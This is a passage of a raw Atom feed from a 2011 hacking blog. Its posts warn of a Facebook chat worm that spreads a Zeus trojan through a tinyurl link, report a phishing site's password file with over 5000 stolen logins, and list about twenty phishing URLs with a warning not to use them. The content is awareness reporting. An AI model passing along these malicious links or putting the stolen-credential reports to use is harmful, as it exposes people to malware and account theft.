href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=WNzy56q3FYo:wJebj3njcVk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=WNzy56q3FYo:wJebj3njcVk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/WNzy56q3FYo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4864899737554424927/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/elearn-security-beginners-course-for.html#comment-form" title="7 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4864899737554424927?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4864899737554424927?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/WNzy56q3FYo/elearn-security-beginners-course-for.html" title="Elearn Security Beginners Course For Penetration Testers" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-YTOjX3jJDYk/TtPuOQKVMvI/AAAAAAAABj0/24_4PvxDn7k/s72-c/336x280-stud.gif" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/elearn-security-beginners-course-for.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak4GQno_fCp7ImA9WhRRGEw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6299648006340030647</id><published>2011-12-01T12:07:00.000-08:00</published><updated>2011-12-02T01:42:03.444-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-02T01:42:03.444-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="contests" /><title>Winners Announced!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_fMrF3L8CTmg/TTNSkhiek6I/AAAAAAAABK0/vbNchxhu7uw/s1600/Facebook.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="296" src="http://3.bp.blogspot.com/_fMrF3L8CTmg/TTNSkhiek6I/AAAAAAAABK0/vbNchxhu7uw/s400/Facebook.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;It's finally time to announce winners for My "&lt;b&gt;&lt;a href="http://facebookhackingcourse.com/"&gt;Facebook Hacking Course&lt;/a&gt;&lt;/b&gt;", First of all I would like to thank all the people who participated in the contest, I received more entries then I expected, most of them were on our Facebook Fan Page and on the comments section. We also received some private entries from people who were not interested in revealing their email addresses through the comments section.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
As mentioned before in the contest declaration article, that I would be only giving two copies of my new &lt;b&gt;Facebook hacking course&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Here are the lucky winners:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Winners With Most Shares:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Danial&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Randomly Selected Winner:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;Sarwan Baloch&lt;b&gt;.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
So guys, take some time to congratulate contest Winners. If you're one of them, hearty congratulations to you. If you're not one of them, don't worry, there are many more contests to come&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-6299648006340030647?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=RIDzQxsu-wU:2kLJzMM1euA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=RIDzQxsu-wU:2kLJzMM1euA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=RIDzQxsu-wU:2kLJzMM1euA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=RIDzQxsu-wU:2kLJzMM1euA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=RIDzQxsu-wU:2kLJzMM1euA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/RIDzQxsu-wU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6299648006340030647/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/winners-announced.html#comment-form" title="16 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6299648006340030647?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6299648006340030647?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/RIDzQxsu-wU/winners-announced.html" title="Winners Announced!" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_fMrF3L8CTmg/TTNSkhiek6I/AAAAAAAABK0/vbNchxhu7uw/s72-c/Facebook.jpg" height="72" width="72" /><thr:total>16</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/winners-announced.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8DSHg5fCp7ImA9WhRRF0k.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3034746497082565439</id><published>2011-12-01T06:14:00.000-08:00</published><updated>2011-12-01T06:14:39.624-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-01T06:14:39.624-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hack Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><title>Beware! New Picture Worm Hits Facebook Today</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s1600/0631255600.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s1600/0631255600.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
From last few months, Facebook has been widely&amp;nbsp;targeted&amp;nbsp;for scam and spreading malware, One of the those spreading worm I discovered recently was when I was chatting with my friend, The following message from the sudden&amp;nbsp;appeared.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ih9hbyITnR0/TteGyvKXQMI/AAAAAAAABkU/UUjqV42YVhY/s1600/rafay.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-ih9hbyITnR0/TteGyvKXQMI/AAAAAAAABkU/UUjqV42YVhY/s1600/rafay.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;blockquote class="tr_bq" style="text-align: center;"&gt;hehehI!!! lool http://tinyurl.com/Wooo-2841-jpg&lt;/blockquote&gt;From the above screenshot, you can clearly see that tinyurl has been used to shorten the URL, One more thing to note is that it's not an image file as image files end with &lt;b&gt;.JPG&lt;/b&gt; extension then &lt;b&gt;-jpg&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-wSLzjy_0HrA/TteIeqn30vI/AAAAAAAABkc/aiHOZzBL7Y4/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-wSLzjy_0HrA/TteIeqn30vI/AAAAAAAABkc/aiHOZzBL7Y4/s1600/Untitled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;The above screenshot describes a more clear picture of what you are going to download along with the JPG file. The exe is basically a Zeus Trojan, Zeus is one of the most popular botnets used for stealing&amp;nbsp;sensitive&amp;nbsp;information&amp;nbsp;such as passwords, credit card numbers. One of it's popular feature is an Anti VM and Anti Sandbox capability, Making it useless for testing it inside virtual environments.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;A scan at Virus total shows that only &lt;b&gt;3/18&lt;/b&gt; URL scanners were able to detect it as a malware site, Rest of them failed.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-m8fKt9OUeTk/TteKaZ9Di9I/AAAAAAAABkk/Aq0IEM7Dkms/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-m8fKt9OUeTk/TteKaZ9Di9I/AAAAAAAABkk/Aq0IEM7Dkms/s1600/Untitled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;Kindly spread the news by sharing it with your friends and people you know, So they should not fall for the malware.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3034746497082565439?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e-Qh7Lhu6Ww:HRbxjcvjgko:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e-Qh7Lhu6Ww:HRbxjcvjgko:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e-Qh7Lhu6Ww:HRbxjcvjgko:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e-Qh7Lhu6Ww:HRbxjcvjgko:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e-Qh7Lhu6Ww:HRbxjcvjgko:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/e-Qh7Lhu6Ww" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3034746497082565439/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/beware-new-picture-worm-hits-facebook.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3034746497082565439?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3034746497082565439?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/e-Qh7Lhu6Ww/beware-new-picture-worm-hits-facebook.html" title="Beware! New Picture Worm Hits Facebook Today" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-bP1RdDEXpew/TteLPDQ6wVI/AAAAAAAABks/huVjfxrgZCQ/s72-c/0631255600.jpg" height="72" width="72" /><thr:total>8</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/beware-new-picture-worm-hits-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4GQnk7cSp7ImA9WhRRFUw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4025238211590498658</id><published>2011-11-28T13:47:00.000-08:00</published><updated>2011-11-28T13:48:43.709-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-28T13:48:43.709-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>French Facebook Phishing Scam Steals More Than 5000 Facebook Accounts</title><content type="html">In my previous post "&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/11/facebook-phishing-scams-at-its-best.html"&gt;Facebook Phishing At It's Best&lt;/a&gt;&lt;/b&gt;" I wrote about recent facebook related phishing scam stealing thousands of facebook accounts, However every time I come across a phishing site, I try to find the password file which saves the entered passwords, I was able to obtain the passwords txt file, However what&amp;nbsp;surprised&amp;nbsp;me most that a french facebook phishing site had more than 5000 entered usernames and passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-iFxdQIBNtKc/TtQBG4AcDWI/AAAAAAAABkE/Fn9CCBjxsUI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="304" src="http://3.bp.blogspot.com/-iFxdQIBNtKc/TtQBG4AcDWI/AAAAAAAABkE/Fn9CCBjxsUI/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Here is the exposed password file with over 5000 passwords:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-1kyfdpwWRYQ/TtQBPN8TNpI/AAAAAAAABkM/9Yhu3X47-As/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="461" src="http://4.bp.blogspot.com/-1kyfdpwWRYQ/TtQBPN8TNpI/AAAAAAAABkM/9Yhu3X47-As/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
I am screening through the password files of rest of the phishing pages, I will update you once I find some more of them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-4025238211590498658?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TVXZ12KhVhk:mq57LEUo794:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TVXZ12KhVhk:mq57LEUo794:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TVXZ12KhVhk:mq57LEUo794:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TVXZ12KhVhk:mq57LEUo794:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TVXZ12KhVhk:mq57LEUo794:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/TVXZ12KhVhk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4025238211590498658/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/11/facebook-phishing-scam-steals-5000.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4025238211590498658?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4025238211590498658?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/TVXZ12KhVhk/facebook-phishing-scam-steals-5000.html" title="French Facebook Phishing Scam Steals More Than 5000 Facebook Accounts" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-iFxdQIBNtKc/TtQBG4AcDWI/AAAAAAAABkE/Fn9CCBjxsUI/s72-c/2.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/11/facebook-phishing-scam-steals-5000.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcDQXw_fip7ImA9WhRRFUw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9041482978147031021</id><published>2011-11-28T13:34:00.000-08:00</published><updated>2011-11-28T13:34:30.246-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-28T13:34:30.246-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Security tips" /><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><title>Facebook Phishing Scams At It's Best</title><content type="html">&lt;img src="http://3.bp.blogspot.com/-Qc8_-sr52Yk/TkV_RstmlVI/AAAAAAAABYM/sKPMELu4C3c/s1600/facebookphishing.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
Phishing as discussed before is one of the most widely used method to hack a facebook account, Phishing holds the top position in an article I wrote on &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/08/hack-facebook-account-passwords.html"&gt;10 Ways How Hackers Can Hack Your Facebook Account&lt;/a&gt;&lt;/b&gt; In 2011. There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims &lt;b&gt;"Email Address"&lt;/b&gt; and &lt;b&gt;"Password"&lt;/b&gt; is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
In a recent research by security-web center, A collection of 35 phishing sites have been made public, below mentioned are the 35 different phishing websites found by security-webcenter.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-pDMcVILMfVI/TtP-K_BZOZI/AAAAAAAABj8/5pqSY2evEIM/s1600/Untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://3.bp.blogspot.com/-pDMcVILMfVI/TtP-K_BZOZI/AAAAAAAABj8/5pqSY2evEIM/s640/Untitled.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note:&lt;span class="Apple-style-span" style="color: red;"&gt; Please Don’t Try to login on listed websites.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.sanagustinturismo.co/Facebook/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.facebook.pcriot.com/login.php&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://deadlyplayerx.binhoster.com/Facebook/securelogin.php&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://facelook.shop.co/login.php&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://sigininto.horizon-host.com/facbook/facebook.php&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://custom-facebook.info/facebook.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.profile.co.gp/facebook/photo.phpfbid=12447510&amp;amp;set=a.478812.I41224&amp;amp;type=1&amp;amp;theater.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://s6.mywibes.com/facebook.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.fjtech.us/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://myoneid.site90.com/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://facedook.co.gp/wwwfacebookcomprofilephpid100001548737188.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://faceebook-com.bugs3.com/login/Secured_Re-login/index1.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://facebooook.axfree.com/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://combatarms.free.fr/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://sweed.web44.net/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://thekshitij.in/facebook/index1.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://addgames.awardspace.biz/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
